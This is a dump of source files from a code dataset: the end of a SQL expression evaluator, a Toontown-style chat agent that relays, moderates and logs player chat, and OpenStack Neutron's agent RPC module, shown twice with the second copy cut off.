return '%s IN (%s)' % (simple_expr[0], expr_value[0]), True
return '%s IN (expr)' % (simple_expr[0], ), False
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_bool_primary(row, tree): # pylint: disable=too-many-return-statements
"""Evaluate bool_primary"""
if tree[0] == 'IS NULL':
bool_primary1 = eval_bool_primary(row, tree[1])
return "%s IS NULL" % bool_primary1[0], \
bool_primary1[1] is None
elif tree[0] == 'IS NOT NULL':
bool_primary1 = eval_bool_primary(row, tree[1])
return "%s IS NOT NULL" % bool_primary1[0], \
bool_primary1[1] is not None
elif tree[0] == '=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s = %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] == bool_primary2[1]
)
elif tree[0] == '>=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s >= %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] >= bool_primary2[1]
)
elif tree[0] == '>':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s > %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] > bool_primary2[1]
)
elif tree[0] == '<=':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s <= %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] <= bool_primary2[1]
)
elif tree[0] == '<':
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s < %s" % (bool_primary1[0], bool_primary2[0]),
bool_primary1[1] < bool_primary2[1]
)
elif tree[0] in ['<>', '!=']:
bool_primary1 = eval_bool_primary(row, tree[1])
bool_primary2 = eval_bool_primary(row, tree[2])
return (
"%s %s %s" % (bool_primary1[0], tree[0], bool_primary2[0]),
bool_primary1[1] != bool_primary2[1]
)
elif tree[0] == 'predicate':
return eval_predicate(row, tree[1])
elif tree[0] == 'bit_expr':
return eval_bit_expr(row, tree[1])
else:
raise SQLParserError('%s is not implemented' % tree[0])
def eval_expr(row, tree):
"""Evaluate expression
:return: Tuple with string representation and value.
For example, ('id', 5).
:rtype: tuple
"""
if tree[0] == 'OR':
expr1 = eval_expr(row, tree[1])
expr2 = eval_expr(row, tree[2])
return (
'%s OR %s' % (expr1[0], expr2[0]),
expr1[1] or expr2[1]
)
elif tree[0] == 'AND':
expr1 = eval_expr(row, tree[1])
expr2 = eval_expr(row, tree[2])
return (
'%s AND %s' % (expr1[0], expr2[0]),
expr1[1] and expr2[1]
)
elif tree[0] == 'NOT':
expr1 = eval_expr(row, tree[1])
return (
'NOT %s' % expr1[0],
not expr1[1]
)
elif tree[0] == 'bool_primary':
return eval_bool_primary(row, tree[1])
else:
raise SQLParserError('%r is not implemented' % tree[0]) | 0.76856 | 0.439988 |
from direct.distributed.DistributedObjectGlobalAI import DistributedObjectGlobalAI
from direct.directnotify import DirectNotifyGlobal
from toontown.chat.ChatGlobals import *
from otp.distributed import OtpDoGlobals
from direct.distributed.PyDatagram import PyDatagram
from direct.distributed.MsgTypes import *
from time import gmtime, strftime
import json
import httplib
import six
def to_bool(boolorstr):
if isinstance(boolorstr, six.string_types):
return boolorstr.lower() == 'true'
if isinstance(boolorstr, bool):
return boolorstr
else:
return False
class ChatAgentAI(DistributedObjectGlobalAI):
notify = DirectNotifyGlobal.directNotify.newCategory("ChatAgentAI")
def __init__(self, air):
DistributedObjectGlobalAI.__init__(self, air)
self.chatMode2channel = {
1: OtpDoGlobals.OTP_MOD_CHANNEL,
2: OtpDoGlobals.OTP_ADMIN_CHANNEL,
3: OtpDoGlobals.OTP_SYSADMIN_CHANNEL,
}
self.air = air
self.accept('requestToonAccess', self.getToonAccess)
self.accept('warningUpdate', self.updateWarnings)
self.accept('requestOffenses', self.sendAvatarOffenses)
self.accept('sendSystemMessage', self.sendSystemMessage)
self.accept('chatBan', self.banAvatar)
self.accountId = 0
self.domain = str(ConfigVariableString('ws-domain', 'localhost'))
self.key = str(ConfigVariableString('ws-key', 'secretkey'))
def chatMessage(self, message, fakeChatMode):
sender = self.air.getAvatarIdFromSender()
if not sender:
self.air.writeServerEvent('suspicious', self.air.getAccountIdFromSender(),
'Account sent chat without an avatar', message)
return
if fakeChatMode != 0:
# We've caught a skid!
self.notify.warning('Fake chat mode was not zero for avatar %s' % sender)
return
av = self.air.doId2do.get(sender)
if not av:
return
chatMode = av.getChatMode()
self.sendUpdate('chatMessageAiToUd', [sender, message, chatMode])
def chatMessageResponse(self, sender, message, modifications, chatMode):
if sender not in self.air.doId2do.keys():
# found an invalid sender!
return
av = self.air.doId2do[sender]
if not av:
# got a invalid avatar object!
return
# broadcast chat message update
av.b_setTalk(sender, self.chatMode2channel.get(chatMode, sender), av.getName(), message, modifications,
CFSpeech | CFQuicktalker | CFTimeout)
self.air.dbInterface.queryObject(self.air.dbId, av.DISLid, self.dbCallback)
getRealUsername = httplib.HTTPSConnection(self.domain)
getRealUsername.request('GET', '/api/tokentousername/%s/%s' % (self.key, self.accountId))
try:
f = getRealUsername.getresponse().read()
getRealUsernameResp = json.loads(f)
if to_bool(getRealUsernameResp["error"]):
username = "ERROR " + getRealUsernameResp["message"]
else:
username = getRealUsernameResp['username']
except:
self.notify.debug("Fatal Error During Logging!")
username = 'ERRORED'
filename = 'data/%s_chatlog.txt' % str(self.air.districtId)
file = open(filename, 'a')
file.write(strftime("%Y-%m-%d %H:%M:%S", gmtime()) + ': ' + str(sender) + '(%s)' % username + ': ' + message + "\n")
file.close()
def dbCallback(self, dclass, fields):
if dclass != self.air.dclassesByName['AccountAI']:
return
self.accountId = fields.get('ACCOUNT_ID')
if not self.accountId:
return
def getToonAccess(self, avId):
av = self.air.doId2do.get(avId)
if not av:
return
access = av.getAccessLevel()
self.air.sendNetEvent('requestToonAccessResponse', [access])
def sendAvatarOffenses(self, avId, sender):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to update %d's chat offenses!" % (int(avId)))
return
self.air.sendNetEvent('setAvatarOffenses', [sender, int(av.getWarningCount())])
def banAvatar(self, avId, msg, time):
self.notify.debug("Got ban request from Uberdog!")
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to ban %d for chat abuse!" % (int(avId)))
return
if av.getAdminAccess() < MINIMUM_MAGICWORD_ACCESS:
av.doWarningBan('Chat Abuse', 24)
def sendSystemMessage(self, message, avId):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to send system message for %d" % (int(avId)))
return
self.air.newsManager.sendSystemMessageToAvatar(av, message, 10)
def updateWarnings(self, avId, count, doBan):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to update %d's warnings!" % (int(avId)))
return
av.b_setWarningCount(count, doBan)
def kickForSpam(self, avatar):
pass | otp/chat/ChatAgentAI.py | from direct.distributed.DistributedObjectGlobalAI import DistributedObjectGlobalAI
from direct.directnotify import DirectNotifyGlobal
from toontown.chat.ChatGlobals import *
from otp.distributed import OtpDoGlobals
from direct.distributed.PyDatagram import PyDatagram
from direct.distributed.MsgTypes import *
from time import gmtime, strftime
import json
import httplib
import six
def to_bool(boolorstr):
if isinstance(boolorstr, six.string_types):
return boolorstr.lower() == 'true'
if isinstance(boolorstr, bool):
return boolorstr
else:
return False
class ChatAgentAI(DistributedObjectGlobalAI):
notify = DirectNotifyGlobal.directNotify.newCategory("ChatAgentAI")
def __init__(self, air):
DistributedObjectGlobalAI.__init__(self, air)
self.chatMode2channel = {
1: OtpDoGlobals.OTP_MOD_CHANNEL,
2: OtpDoGlobals.OTP_ADMIN_CHANNEL,
3: OtpDoGlobals.OTP_SYSADMIN_CHANNEL,
}
self.air = air
self.accept('requestToonAccess', self.getToonAccess)
self.accept('warningUpdate', self.updateWarnings)
self.accept('requestOffenses', self.sendAvatarOffenses)
self.accept('sendSystemMessage', self.sendSystemMessage)
self.accept('chatBan', self.banAvatar)
self.accountId = 0
self.domain = str(ConfigVariableString('ws-domain', 'localhost'))
self.key = str(ConfigVariableString('ws-key', 'secretkey'))
def chatMessage(self, message, fakeChatMode):
sender = self.air.getAvatarIdFromSender()
if not sender:
self.air.writeServerEvent('suspicious', self.air.getAccountIdFromSender(),
'Account sent chat without an avatar', message)
return
if fakeChatMode != 0:
# We've caught a skid!
self.notify.warning('Fake chat mode was not zero for avatar %s' % sender)
return
av = self.air.doId2do.get(sender)
if not av:
return
chatMode = av.getChatMode()
self.sendUpdate('chatMessageAiToUd', [sender, message, chatMode])
def chatMessageResponse(self, sender, message, modifications, chatMode):
if sender not in self.air.doId2do.keys():
# found an invalid sender!
return
av = self.air.doId2do[sender]
if not av:
# got a invalid avatar object!
return
# broadcast chat message update
av.b_setTalk(sender, self.chatMode2channel.get(chatMode, sender), av.getName(), message, modifications,
CFSpeech | CFQuicktalker | CFTimeout)
self.air.dbInterface.queryObject(self.air.dbId, av.DISLid, self.dbCallback)
getRealUsername = httplib.HTTPSConnection(self.domain)
getRealUsername.request('GET', '/api/tokentousername/%s/%s' % (self.key, self.accountId))
try:
f = getRealUsername.getresponse().read()
getRealUsernameResp = json.loads(f)
if to_bool(getRealUsernameResp["error"]):
username = "ERROR " + getRealUsernameResp["message"]
else:
username = getRealUsernameResp['username']
except:
self.notify.debug("Fatal Error During Logging!")
username = 'ERRORED'
filename = 'data/%s_chatlog.txt' % str(self.air.districtId)
file = open(filename, 'a')
file.write(strftime("%Y-%m-%d %H:%M:%S", gmtime()) + ': ' + str(sender) + '(%s)' % username + ': ' + message + "\n")
file.close()
def dbCallback(self, dclass, fields):
if dclass != self.air.dclassesByName['AccountAI']:
return
self.accountId = fields.get('ACCOUNT_ID')
if not self.accountId:
return
def getToonAccess(self, avId):
av = self.air.doId2do.get(avId)
if not av:
return
access = av.getAccessLevel()
self.air.sendNetEvent('requestToonAccessResponse', [access])
def sendAvatarOffenses(self, avId, sender):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to update %d's chat offenses!" % (int(avId)))
return
self.air.sendNetEvent('setAvatarOffenses', [sender, int(av.getWarningCount())])
def banAvatar(self, avId, msg, time):
self.notify.debug("Got ban request from Uberdog!")
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to ban %d for chat abuse!" % (int(avId)))
return
if av.getAdminAccess() < MINIMUM_MAGICWORD_ACCESS:
av.doWarningBan('Chat Abuse', 24)
def sendSystemMessage(self, message, avId):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to send system message for %d" % (int(avId)))
return
self.air.newsManager.sendSystemMessageToAvatar(av, message, 10)
def updateWarnings(self, avId, count, doBan):
av = self.air.doId2do.get(avId, 0)
if av == 0:
self.notify.warning("Failed to update %d's warnings!" % (int(avId)))
return
av.b_setWarningCount(count, doBan)
def kickForSpam(self, avatar):
pass | 0.507568 | 0.051893 |
from datetime import datetime
import itertools
import netaddr
from neutron_lib.agent import topics
from neutron_lib.api.definitions import portbindings_extended as pb_ext
from neutron_lib.callbacks import events as callback_events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources as callback_resources
from neutron_lib import constants
from neutron_lib.plugins import utils
from neutron_lib import rpc as lib_rpc
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import uuidutils
from neutron.agent import resource_cache
from neutron.api.rpc.callbacks import resources
from neutron.common import _constants as n_const
from neutron import objects
LOG = logging.getLogger(__name__)
BINDING_DEACTIVATE = 'binding_deactivate'
def create_consumers(endpoints, prefix, topic_details, start_listening=True):
"""Create agent RPC consumers.
:param endpoints: The list of endpoints to process the incoming messages.
:param prefix: Common prefix for the plugin/agent message queues.
:param topic_details: A list of topics. Each topic has a name, an
operation, and an optional host param keying the
subscription to topic.host for plugin calls.
:param start_listening: if True, it starts the processing loop
:returns: A common Connection.
"""
connection = lib_rpc.Connection()
for details in topic_details:
topic, operation, node_name = itertools.islice(
itertools.chain(details, [None]), 3)
topic_name = topics.get_topic_name(prefix, topic, operation)
connection.create_consumer(topic_name, endpoints, fanout=True)
if node_name:
node_topic_name = '%s.%s' % (topic_name, node_name)
connection.create_consumer(node_topic_name,
endpoints,
fanout=False)
if start_listening:
connection.consume_in_threads()
return connection
class PluginReportStateAPI(object):
"""RPC client used to report state back to plugin.
This class implements the client side of an rpc interface. The server side
can be found in neutron.db.agents_db.AgentExtRpcCallback. For more
information on changing rpc interfaces, see
doc/source/contributor/internals/rpc_api.rst.
"""
def __init__(self, topic):
target = oslo_messaging.Target(topic=topic, version='1.2',
namespace=constants.RPC_NAMESPACE_STATE)
self.client = lib_rpc.get_client(target)
def has_alive_neutron_server(self, context, **kwargs):
cctxt = self.client.prepare()
return cctxt.call(context, 'has_alive_neutron_server', **kwargs)
def report_state(self, context, agent_state, use_call=False):
cctxt = self.client.prepare(
timeout=lib_rpc.TRANSPORT.conf.rpc_response_timeout)
# add unique identifier to a report
# that can be logged on server side.
# This create visible correspondence between events on
# the agent and on the server
agent_state['uuid'] = uuidutils.generate_uuid()
kwargs = {
'agent_state': {'agent_state': agent_state},
'time': datetime.utcnow().strftime(constants.ISO8601_TIME_FORMAT),
}
method = cctxt.call if use_call else cctxt.cast
return method(context, 'report_state', **kwargs)
class PluginApi(object):
'''Agent side of the rpc API.
API version history:
1.0 - Initial version.
1.3 - get_device_details rpc signature upgrade to obtain 'host' and
return value to include fixed_ips and device_owner for
the device port
1.4 - tunnel_sync rpc signature upgrade to obtain 'host'
1.5 - Support update_device_list and
get_devices_details_list_and_failed_devices
'''
def __init__(self, topic):
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = lib_rpc.get_client(target)
def get_device_details(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'get_device_details', device=device,
agent_id=agent_id, host=host)
def get_devices_details_list(self, context, devices, agent_id, host=None):
cctxt = self.client.prepare(version='1.3')
return cctxt.call(context, 'get_devices_details_list',
devices=devices, agent_id=agent_id, host=host)
def get_devices_details_list_and_failed_devices(self, context, devices,
agent_id, host=None):
"""Get devices details and the list of devices that failed.
This method returns the devices details. If an error is thrown when
retrieving the devices details, the device is put in a list of
failed devices.
"""
cctxt = self.client.prepare(version='1.5')
return cctxt.call(
context,
'get_devices_details_list_and_failed_devices',
devices=devices, agent_id=agent_id, host=host)
def update_device_down(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'update_device_down', device=device,
agent_id=agent_id, host=host)
def update_device_up(self, context, device, agent_id, host=None):
cctxt = self.client.prepare()
return cctxt.call(context, 'update_device_up', device=device,
agent_id=agent_id, host=host)
def update_device_list(self, context, devices_up, devices_down,
agent_id, host, agent_restarted=False):
cctxt = self.client.prepare(version='1.5')
ret_devices_up = []
failed_devices_up = []
ret_devices_down = []
failed_devices_down = []
step = n_const.RPC_RES_PROCESSING_STEP
devices_up = list(devices_up)
devices_down = list(devices_down)
for i in range(0, max(len(devices_up), len(devices_down)), step):
# Divide-and-conquer RPC timeout
ret = cctxt.call(context, 'update_device_list',
devices_up=devices_up[i:i + step],
devices_down=devices_down[i:i + step],
agent_id=agent_id, host=host,
agent_restarted=agent_restarted)
ret_devices_up.extend(ret.get("devices_up", []))
failed_devices_up.extend(ret.get("failed_devices_up", []))
ret_devices_down.extend(ret.get("devices_down", []))
failed_devices_down.extend(ret.get("failed_devices_down", []))
return {'devices_up': ret_devices_up,
'failed_devices_up': failed_devices_up,
'devices_down': ret_devices_down,
'failed_devices_down': failed_devices_down}
def tunnel_sync(self, context, tunnel_ip, tunnel_type=None, host=None):
cctxt = self.client.prepare(version='1.4')
return cctxt.call(context, 'tunnel_sync', tunnel_ip=tunnel_ip,
tunnel_type=tunnel_type, host=host)
def create_cache_for_l2_agent():
    """Build and start a push-notification resource cache for an L2 agent.

    Registers the versioned object types, then creates a
    RemoteResourceCache watching the resource types an L2 agent consumes
    and starts its notification watcher.
    """
    objects.register_objects()
    watched = [resources.PORT, resources.SECURITYGROUP,
               resources.SECURITYGROUPRULE, resources.NETWORK,
               resources.SUBNET]
    cache = resource_cache.RemoteResourceCache(watched)
    cache.start_watcher()
    return cache
class CacheBackedPluginApi(PluginApi):
    """PluginApi variant that answers device queries from a local cache.

    Instead of round-tripping to the server for get_device_details, this
    implementation reads ports/networks from a push-notification backed
    RemoteResourceCache (see create_cache_for_l2_agent).
    """

    def __init__(self, *args, **kwargs):
        super(CacheBackedPluginApi, self).__init__(*args, **kwargs)
        # Cache kept up to date via server push notifications.
        self.remote_resource_cache = create_cache_for_l2_agent()
    def register_legacy_notification_callbacks(self, legacy_interface):
        """Emulates the server-side notifications from ml2 AgentNotifierApi.

        legacy_interface is an object with 'delete'/'update' methods for
        core resources.
        """
        self._legacy_interface = legacy_interface
        # Relay push-notification events for ports and networks into the
        # legacy-style per-resource callbacks.
        for e in (callback_events.AFTER_UPDATE, callback_events.AFTER_DELETE):
            for r in (resources.PORT, resources.NETWORK):
                registry.subscribe(self._legacy_notifier, r, e)
    def _legacy_notifier(self, rtype, event, trigger, context, resource_id,
                         **kwargs):
        """Checks if legacy interface is expecting calls for resource.

        Looks for port_update, network_delete, etc. and calls them with
        the payloads the handlers are expecting (an ID).
        """
        rtype = rtype.lower()  # all legacy handlers don't camelcase
        method, host_with_activation, host_with_deactivation = (
            self._get_method_host(rtype, event, **kwargs))
        if not hasattr(self._legacy_interface, method):
            # TODO(kevinbenton): once these notifications are stable, emit
            # a deprecation warning for legacy handlers
            return
        # If there is a binding deactivation, we must also notify the
        # corresponding activation
        if method == BINDING_DEACTIVATE:
            self._legacy_interface.binding_deactivate(
                context, port_id=resource_id, host=host_with_deactivation)
            self._legacy_interface.binding_activate(
                context, port_id=resource_id, host=host_with_activation)
        else:
            # e.g. {'port': {'id': ...}, 'port_id': ...} for a port event.
            payload = {rtype: {'id': resource_id},
                       '%s_id' % rtype: resource_id}
            getattr(self._legacy_interface, method)(context, **payload)
    def _get_method_host(self, rtype, event, **kwargs):
        """Constructs the name of method to be called in the legacy interface.

        If the event received is a port update that contains a binding
        activation where a previous binding is deactivated, the method name
        is 'binding_deactivate' and the host where the binding has to be
        deactivated is returned. Otherwise, the method name is constructed
        from rtype and the event received and the host is None.
        """
        is_delete = event == callback_events.AFTER_DELETE
        suffix = 'delete' if is_delete else 'update'
        method = "%s_%s" % (rtype, suffix)
        host_with_activation = None
        host_with_deactivation = None
        # Only port updates can carry a binding activation.
        if is_delete or rtype != callback_resources.PORT:
            return method, host_with_activation, host_with_deactivation
        # A port update was received. Find out if it is a binding activation
        # where a previous binding was deactivated
        BINDINGS = pb_ext.COLLECTION_NAME
        if BINDINGS in kwargs.get('changed_fields', set()):
            existing_active_binding = (
                utils.get_port_binding_by_status_and_host(
                    getattr(kwargs['existing'], 'bindings', []),
                    constants.ACTIVE))
            updated_active_binding = (
                utils.get_port_binding_by_status_and_host(
                    getattr(kwargs['updated'], 'bindings', []),
                    constants.ACTIVE))
            # The ACTIVE binding moved between hosts and the old host still
            # carries an INACTIVE binding: report it as a deactivation.
            if (existing_active_binding and updated_active_binding and
                    existing_active_binding.host !=
                    updated_active_binding.host):
                if (utils.get_port_binding_by_status_and_host(
                        getattr(kwargs['updated'], 'bindings', []),
                        constants.INACTIVE,
                        host=existing_active_binding.host)):
                    method = BINDING_DEACTIVATE
                    host_with_activation = updated_active_binding.host
                    host_with_deactivation = existing_active_binding.host
        return method, host_with_activation, host_with_deactivation
    def get_devices_details_list_and_failed_devices(self, context, devices,
                                                    agent_id, host=None):
        """Resolve details for each device, collecting per-device failures.

        Unlike the base-class RPC version, failures here come from local
        cache lookups rather than from the server.
        """
        result = {'devices': [], 'failed_devices': []}
        for device in devices:
            try:
                result['devices'].append(
                    self.get_device_details(context, device, agent_id, host))
            except Exception:
                LOG.exception("Failed to get details for device %s", device)
                result['failed_devices'].append(device)
        return result
    def get_device_details(self, context, device, agent_id, host=None):
        """Build the device-details dict for *device* from the local cache.

        Returns a minimal {'device': ...} dict when the port is unknown,
        unbound, or has no bound segment; flags NO_ACTIVE_BINDING when a
        compute-owned port's ACTIVE binding lives on a different host.
        """
        port_obj = self.remote_resource_cache.get_resource_by_id(
            resources.PORT, device)
        if not port_obj:
            LOG.debug("Device %s does not exist in cache.", device)
            return {'device': device}
        if not port_obj.binding_levels:
            LOG.warning("Device %s is not bound.", port_obj)
            return {'device': device}
        # The segment is taken from the last binding level.
        segment = port_obj.binding_levels[-1].segment
        if not segment:
            LOG.debug("Device %s is not bound to any segment.", port_obj)
            return {'device': device}
        binding = utils.get_port_binding_by_status_and_host(
            port_obj.bindings, constants.ACTIVE, raise_if_not_found=True,
            port_id=port_obj.id)
        # Compute-owned ports are only answered when the ACTIVE binding is
        # on this agent's host.
        if (port_obj.device_owner.startswith(
                constants.DEVICE_OWNER_COMPUTE_PREFIX) and
                binding[pb_ext.HOST] != host):
            LOG.debug("Device %s has no active binding in this host",
                      port_obj)
            return {'device': device,
                    constants.NO_ACTIVE_BINDING: True}
        net = self.remote_resource_cache.get_resource_by_id(
            resources.NETWORK, port_obj.network_id)
        net_qos_policy_id = net.qos_policy_id
        # match format of old RPC interface
        mac_addr = str(netaddr.EUI(str(port_obj.mac_address),
                                   dialect=netaddr.mac_unix_expanded))
        entry = {
            'device': device,
            'network_id': port_obj.network_id,
            'port_id': port_obj.id,
            'mac_address': mac_addr,
            'admin_state_up': port_obj.admin_state_up,
            'network_type': segment.network_type,
            'segmentation_id': segment.segmentation_id,
            'physical_network': segment.physical_network,
            'fixed_ips': [{'subnet_id': o.subnet_id,
                           'ip_address': str(o.ip_address)}
                          for o in port_obj.fixed_ips],
            'device_owner': port_obj.device_owner,
            'allowed_address_pairs': [{'mac_address': o.mac_address,
                                       'ip_address': o.ip_address}
                                      for o in port_obj.allowed_address_pairs],
            # Ports without security info default to port security enabled.
            'port_security_enabled': getattr(port_obj.security,
                                             'port_security_enabled', True),
            'qos_policy_id': port_obj.qos_policy_id,
            'network_qos_policy_id': net_qos_policy_id,
            'profile': binding.profile,
            'security_groups': list(port_obj.security_group_ids)
        }
        LOG.debug("Returning: %s", entry)
        return entry
def get_devices_details_list(self, context, devices, agent_id, host=None):
return [self.get_device_details(context, device, agent_id, host)
for device in devices] | neutron/agent/rpc.py |
from datetime import datetime
import itertools
import netaddr
from neutron_lib.agent import topics
from neutron_lib.api.definitions import portbindings_extended as pb_ext
from neutron_lib.callbacks import events as callback_events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources as callback_resources
from neutron_lib import constants
from neutron_lib.plugins import utils
from neutron_lib import rpc as lib_rpc
from oslo_log import log as logging
import oslo_messaging
from oslo_utils import uuidutils
from neutron.agent import resource_cache
from neutron.api.rpc.callbacks import resources
from neutron.common import _constants as n_const
from neutron import objects
# Module-level logger for this RPC module.
LOG = logging.getLogger(__name__)
# Name of the legacy-interface method invoked when a port binding moves
# off a host (see CacheBackedPluginApi._legacy_notifier below).
BINDING_DEACTIVATE = 'binding_deactivate'
def create_consumers(endpoints, prefix, topic_details, start_listening=True):
    """Set up the RPC consumers used by an agent.

    :param endpoints: endpoints that will process the incoming messages.
    :param prefix: common prefix for the plugin/agent message queues.
    :param topic_details: list of (topic, operation[, node_name]) entries;
        when node_name is present an extra host-scoped consumer is
        subscribed on topic.node_name.
    :param start_listening: when True, start consuming in threads.
    :returns: the shared Connection object.
    """
    connection = lib_rpc.Connection()
    for entry in topic_details:
        # Pad short entries so node_name defaults to None.
        padded = itertools.chain(entry, [None])
        topic, operation, node_name = itertools.islice(padded, 3)
        topic_name = topics.get_topic_name(prefix, topic, operation)
        connection.create_consumer(topic_name, endpoints, fanout=True)
        if node_name:
            per_node_topic = f'{topic_name}.{node_name}'
            connection.create_consumer(per_node_topic, endpoints,
                                       fanout=False)
    if start_listening:
        connection.consume_in_threads()
    return connection
class PluginReportStateAPI(object):
    """RPC client used to report state back to plugin.

    This class implements the client side of an rpc interface. The server
    side can be found in neutron.db.agents_db.AgentExtRpcCallback. For more
    information on changing rpc interfaces, see
    doc/source/contributor/internals/rpc_api.rst.
    """

    def __init__(self, topic):
        # All calls use the state-report namespace at version 1.2.
        target = oslo_messaging.Target(topic=topic, version='1.2',
                                       namespace=constants.RPC_NAMESPACE_STATE)
        self.client = lib_rpc.get_client(target)

    def has_alive_neutron_server(self, context, **kwargs):
        """Forward the 'has_alive_neutron_server' check to the server."""
        cctxt = self.client.prepare()
        return cctxt.call(context, 'has_alive_neutron_server', **kwargs)

    def report_state(self, context, agent_state, use_call=False):
        """Send this agent's state report to the server.

        :param agent_state: dict of agent status. Mutated in place: a
            fresh 'uuid' is added so agent-side and server-side log
            events can be correlated.
        :param use_call: when True block for the server's reply (call);
            otherwise fire-and-forget (cast).
        """
        cctxt = self.client.prepare(
            timeout=lib_rpc.TRANSPORT.conf.rpc_response_timeout)
        # add unique identifier to a report
        # that can be logged on server side.
        # This create visible correspondence between events on
        # the agent and on the server
        agent_state['uuid'] = uuidutils.generate_uuid()
        kwargs = {
            'agent_state': {'agent_state': agent_state},
            'time': datetime.utcnow().strftime(constants.ISO8601_TIME_FORMAT),
        }
        method = cctxt.call if use_call else cctxt.cast
        return method(context, 'report_state', **kwargs)
class PluginApi(object):
    '''Agent side of the rpc API.

    API version history:
        1.0 - Initial version.
        1.3 - get_device_details rpc signature upgrade to obtain 'host' and
              return value to include fixed_ips and device_owner for
              the device port
        1.4 - tunnel_sync rpc signature upgrade to obtain 'host'
        1.5 - Support update_device_list and
              get_devices_details_list_and_failed_devices
    '''

    def __init__(self, topic):
        # Base target is v1.0; individual calls raise the version as needed.
        target = oslo_messaging.Target(topic=topic, version='1.0')
        self.client = lib_rpc.get_client(target)

    def get_device_details(self, context, device, agent_id, host=None):
        """Fetch the details of a single device from the plugin."""
        cctxt = self.client.prepare()
        return cctxt.call(context, 'get_device_details', device=device,
                          agent_id=agent_id, host=host)

    def get_devices_details_list(self, context, devices, agent_id, host=None):
        """Fetch details for several devices in one call (requires 1.3)."""
        cctxt = self.client.prepare(version='1.3')
        return cctxt.call(context, 'get_devices_details_list',
                          devices=devices, agent_id=agent_id, host=host)

    def get_devices_details_list_and_failed_devices(self, context, devices,
                                                    agent_id, host=None):
        """Get devices details and the list of devices that failed.

        This method returns the devices details. If an error is thrown when
        retrieving the devices details, the device is put in a list of
        failed devices.
        """
        cctxt = self.client.prepare(version='1.5')
        return cctxt.call(
            context,
            'get_devices_details_list_and_failed_devices',
            devices=devices, agent_id=agent_id, host=host)

    def update_device_down(self, context, device, agent_id, host=None):
        """Report that a device went down."""
        cctxt = self.client.prepare()
        return cctxt.call(context, 'update_device_down', device=device,
                          agent_id=agent_id, host=host)

    def update_device_up(self, context, device, agent_id, host=None):
        """Report that a device came up."""
        cctxt = self.client.prepare()
        return cctxt.call(context, 'update_device_up', device=device,
                          agent_id=agent_id, host=host)

    def update_device_list(self, context, devices_up, devices_down,
                           agent_id, host, agent_restarted=False):
        """Report up/down device lists in RPC_RES_PROCESSING_STEP batches.

        Batching keeps each RPC small enough to finish within the response
        timeout; per-batch results are merged before returning.
        """
        cctxt = self.client.prepare(version='1.5')
        ret_devices_up = []
        failed_devices_up = []
        ret_devices_down = []
        failed_devices_down = []
        step = n_const.RPC_RES_PROCESSING_STEP
        # list() so len() and slicing work for any iterable input.
        devices_up = list(devices_up)
        devices_down = list(devices_down)
        for i in range(0, max(len(devices_up), len(devices_down)), step):
            # Divide-and-conquer RPC timeout
            ret = cctxt.call(context, 'update_device_list',
                             devices_up=devices_up[i:i + step],
                             devices_down=devices_down[i:i + step],
                             agent_id=agent_id, host=host,
                             agent_restarted=agent_restarted)
            ret_devices_up.extend(ret.get("devices_up", []))
            failed_devices_up.extend(ret.get("failed_devices_up", []))
            ret_devices_down.extend(ret.get("devices_down", []))
            failed_devices_down.extend(ret.get("failed_devices_down", []))
        return {'devices_up': ret_devices_up,
                'failed_devices_up': failed_devices_up,
                'devices_down': ret_devices_down,
                'failed_devices_down': failed_devices_down}

    def tunnel_sync(self, context, tunnel_ip, tunnel_type=None, host=None):
        """Advertise this agent's tunnel endpoint (requires 1.4)."""
        cctxt = self.client.prepare(version='1.4')
        return cctxt.call(context, 'tunnel_sync', tunnel_ip=tunnel_ip,
                          tunnel_type=tunnel_type, host=host)
def create_cache_for_l2_agent():
    """Create a push-notifications cache for L2 agent related resources."""
    # Register the versioned object classes (presumably required before
    # the cache can receive them -- TODO confirm).
    objects.register_objects()
    resource_types = [
        resources.PORT,
        resources.SECURITYGROUP,
        resources.SECURITYGROUPRULE,
        resources.NETWORK,
        resources.SUBNET
    ]
    rcache = resource_cache.RemoteResourceCache(resource_types)
    # Start listening for server push notifications right away.
    rcache.start_watcher()
    return rcache
class CacheBackedPluginApi(PluginApi):
    """PluginApi variant backed by a local push-notification cache.

    Device-detail queries are answered from a RemoteResourceCache rather
    than via per-call RPCs to the server.
    """

    def __init__(self, *args, **kwargs):
        super(CacheBackedPluginApi, self).__init__(*args, **kwargs)
        # Cache kept current by server push notifications.
        self.remote_resource_cache = create_cache_for_l2_agent()

    def register_legacy_notification_callbacks(self, legacy_interface):
        """Emulates the server-side notifications from ml2 AgentNotifierApi.

        legacy_interface is an object with 'delete'/'update' methods for
        core resources.
        """
        self._legacy_interface = legacy_interface
        # Relay port/network push events into the legacy-style callbacks.
        for e in (callback_events.AFTER_UPDATE, callback_events.AFTER_DELETE):
            for r in (resources.PORT, resources.NETWORK):
                registry.subscribe(self._legacy_notifier, r, e)

    def _legacy_notifier(self, rtype, event, trigger, context, resource_id,
                         **kwargs):
        """Checks if legacy interface is expecting calls for resource.

